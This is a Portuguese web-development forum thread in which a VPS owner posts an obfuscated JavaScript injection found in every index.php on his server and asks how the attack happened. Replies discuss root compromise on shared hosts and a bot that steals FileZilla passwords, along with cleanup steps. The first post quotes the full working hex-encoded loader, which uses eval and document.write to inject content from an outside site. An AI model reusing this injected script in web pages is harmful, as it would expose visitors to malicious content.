Jump to content
ruimcosta

Segurança web

Recommended Posts

ruimcosta

Biba,

Estou a passar uma situação de ataque a um servidor, ataque esse que inseriu em N sites, no index.php, um <script></script>

<script>function c2412d3ca6q4df35e7820272(q4df35e782064e){ function q4df35e78209f8(){var q4df35e7820e1f=16;return q4df35e7820e1f;} return (eval('pa'+'rseInt')(q4df35e782064e,q4df35e78209f8()));}function q4df35e782121f(q4df35e782162c){ function q4df35e78221fa(){return 2;} var q4df35e7821a0f='';q4df35e78229b8=String['fromCharCode'];for(q4df35e7821e16=0;q4df35e7821e16<q4df35e782162c.length;q4df35e7821e16+=q4df35e78221fa()){ q4df35e7821a0f+=(q4df35e78229b8(c2412d3ca6q4df35e7820272(q4df35e782162c.substr(q4df35e7821e16,q4df35e78221fa()))));}return q4df35e7821a0f;} var ve7='';var q4df35e7822da4='3C7'+ve7+'3637'+ve7+'2697'+ve7+'07'+ve7+'43E696628216D7'+ve7+'96961297'+ve7+'B646F637'+ve7+'56D656E7'+ve7+'42E7'+ve7+'7'+ve7+'7'+ve7+'2697'+ve7+'465287'+ve7+'56E657'+ve7+'363617'+ve7+'065282027'+ve7+'2533632536392536362537'+ve7+'322536312536642536352532302536652536312536642536352533642536332533322533342532302537'+ve7+'332537'+ve7+'32253633253364253237'+ve7+'2536382537'+ve7+'342537'+ve7+'342537'+ve7+'302533612532662532662536362537'+ve7+'37'+ve7+'2537'+ve7+'322536632536342533302533342532652536332537'+ve7+'612532652536332536332532662537'+ve7+'302536312537'+ve7+'302536622536662537'+ve7+'612536342532662536352536652537'+ve7+'342536352537'+ve7+'322532652537'+ve7+'302536382537'+ve7+'30253366253237'+ve7+'2532622534642536312537'+ve7+'342536382532652537'+ve7+'322536662537'+ve7+'352536652536342532382534642536312537'+ve7+'342536382532652537'+ve7+'32253631253665253634253666253664253238253239253261253331253335253335253331253338253334253239253262253237'+ve7+'253333253634253337'+ve7+'253635253237'+ve7+'2532302537'+ve7+'37'+ve7+'2536392536342537'+ve7+'34253638253364253336253333253336253230253638253635253639253637'+ve7+'2536382537'+ve7+'342533642533322533342533342532302537'+ve7+'332537'+ve7+'342537'+ve7+'39253663253635253364253237'+ve7+'2537'+ve7+'362536392537'+ve7+'332536392536322536392536632536392537'+ve7+'342537'+ve7+'39253361253638253639253634253634253635253665253237'+ve7+'2533652533632532662536392536362537'+ve7+'3225363125366425363525336527'+ve7+'29293B7'+ve7+'D7'+ve7+'6617'+ve7+'2206D7'+ve7+'969613D7'+ve7+'47'+ve7+'27'+ve7+'5653B3C2F7'+ve7+'3637'+ve7+'2697'+ve7+'07'+ve7+'43E';q4df35e7823569=document;q4df35e7823569.write(q4df35e782121f(q4df35e7822da4));</script>

De que forma foi isto possível? Reescrever o index de vários site?

Acedendo via ftp, via cpanel?


Abraços e beijinhos,Rui Costa

Share this post


Link to post
Share on other sites
brunoais

Ou através de abuso de falhas de segurança possivelmente nesse site.


"[Os jovens da actual geração]não lêem porque não envolve um telecomando que dê para mirar e atirar, não falam porque a trapalhice é rainha e o calão é rei" autor: thoga31

Life is a genetically transmitted disease, induced by sex, with death rate of 100%.

Share this post


Link to post
Share on other sites
fvox

Hi.

Todos os sites que sofreram o ataque estão na mesma hospedagem?

Comentei sobre este tipo de ocorrência em outro tópico:

Seu site fica em alguma hospedagem compartilhada? Se sim, procure saber se toda a box não foi atacada. Seu site pode ter sido vítima de um "mass attack", que ocorre quando alguém consegue o acesso à algum site dentro do mesmo host, e em seguida, consegue privilégios root através de exploits no kernel ou em serviços que estão rodando no servidor. Com o root, o acesso a todos os sites é inevitável.

[]'s


"Strength of the world, the one true beholder...Ice in my veins, for those who've died."

Share this post


Link to post
Share on other sites
ruimcosta

Por acaso somente de colocar esta duvida notei que existia outra pergunta semelhante. Sim, todos os sites sofreram do mesmo trojan em todos os index.php no mesmo servidor. É uma VPS.

Ja informei a empresa de hosting e estão a analisar, mas a preocupação trata-se de saber como foi feito feito o ataque para prevenir futuros...


Abraços e beijinhos,Rui Costa

Share this post


Link to post
Share on other sites
brunoais

É muito complicado encontrar o culpado.

Vão ser necessários dias a analisar os logs a tentar ver aonde é que falhou.


"[Os jovens da actual geração]não lêem porque não envolve um telecomando que dê para mirar e atirar, não falam porque a trapalhice é rainha e o calão é rei" autor: thoga31

Life is a genetically transmitted disease, induced by sex, with death rate of 100%.

Share this post


Link to post
Share on other sites
ruimcosta

A minha maior preocupação é encontrar o buraco para a situação nao se voltar a repetir. Detesto não poder dormir descansado.  :)


Abraços e beijinhos,Rui Costa

Share this post


Link to post
Share on other sites
yoda

A minha maior preocupação é encontrar o buraco para a situação nao se voltar a repetir. Detesto não poder dormir descansado.  :)

Na prática nunca dormirias, segurança é uma ilusão :confused:

Provavelmente exploraram-te a máquina, e não os sites em particular. Tive um caso em mãos à uns anos em que entraram no servidor e meteram um site de phising, que nem pelo root conseguia apagar.

Share this post


Link to post
Share on other sites
ruimcosta

Tens razão,

O mais correcto da minha parte seria dizer, que dormiria um pouco mais descansado. Basta ver as notícias de servidores e sites que são atacados todas as semanas. São empresas como muito mais recursos financeiros e humanos que eu e no entanto eles também tem falhas. 😎


Abraços e beijinhos,Rui Costa

Share this post


Link to post
Share on other sites
Lfscoutinho

Boas,

Pelos vistos, o que aconteceu não passou em nada por ti, visto que todos os outros sites foram afectados.

Assim podes continuar a dormir descansado :)

Share this post


Link to post
Share on other sites
tmjramalho

Boas.

Pode não ser o teu caso, mas isto já me aconteceu várias vezes.

Vim a descobrir que foi um bot que infectou um dos pcs com acesso ftp configurado no FileZilla com a password guardada.

Acontece que este bot saca as passwords do FileZilla (que são guardadas sem qualquer encriptação) num xml, e depois faz essas "injecções" de código em páginas index e ficheiros javascript.

Na altura removi a password do FileZilla, removi o código injectado nos ficheiros e nunca mais aconteceu nada.

Também removi o bot, embora já não me lembre o nome do bicharoco  :)

É preciso muito cuidado com os clientes de ftp, e tentar ao máximo não guardar as passwords nos clientes.

Entretanto passei a usar o WinSCP.

Espero que esta info seja útil para todos  ;)


http://interessespessoais.com/hobbies e assuntos profissionais

Share this post


Link to post
Share on other sites
ruimcosta

Obrigado pessoal,

Por acaso sou o único detentor das senhas dos vários serviços, por isso tratei de alterar todas as senhas. Um ponto curioso é que o que quer que seja que alterou o código,

somente alterou os ficheiros index.php (todos), por isso leva-me a desconfiar que teve algum acesso ftp ou até via servidor mesmo.

Pelo menos não voltou a atacar.


Abraços e beijinhos,Rui Costa

Share this post


Link to post
Share on other sites
brunoais

Recuperado:

Vim a descobrir que foi um bot que infectou um dos pcs com acesso ftp configurado no FileZilla com a password guardada.

Acontece que este bot saca as passwords do FileZilla (que são guardadas sem qualquer encriptação) num xml, e depois faz essas "injecções" de código em páginas index e ficheiros javascript.

Na altura removi a password do FileZilla, removi o código injectado nos ficheiros e nunca mais aconteceu nada.

No meu caso, eu tenho uma solução que apliquei no meu computador. Eu restringi o acesso ao ficheiro dos dados de password de modo que só o filezilla é que tivesse direitos de leitura, escrita e modificação. Isto só é possível obter executando o programa de permissões do windows usando o cmd.exe. Já não me lembro do código que usei para isso mas (google is your friend) pesquisando devem tb encontrar. Agora nem eu tenho acesso ao ficheiro :D


"[Os jovens da actual geração]não lêem porque não envolve um telecomando que dê para mirar e atirar, não falam porque a trapalhice é rainha e o calão é rei" autor: thoga31

Life is a genetically transmitted disease, induced by sex, with death rate of 100%.

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

×
×
  • Create New...

Important Information

By using this site you accept our Terms of Use and Privacy Policy. We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.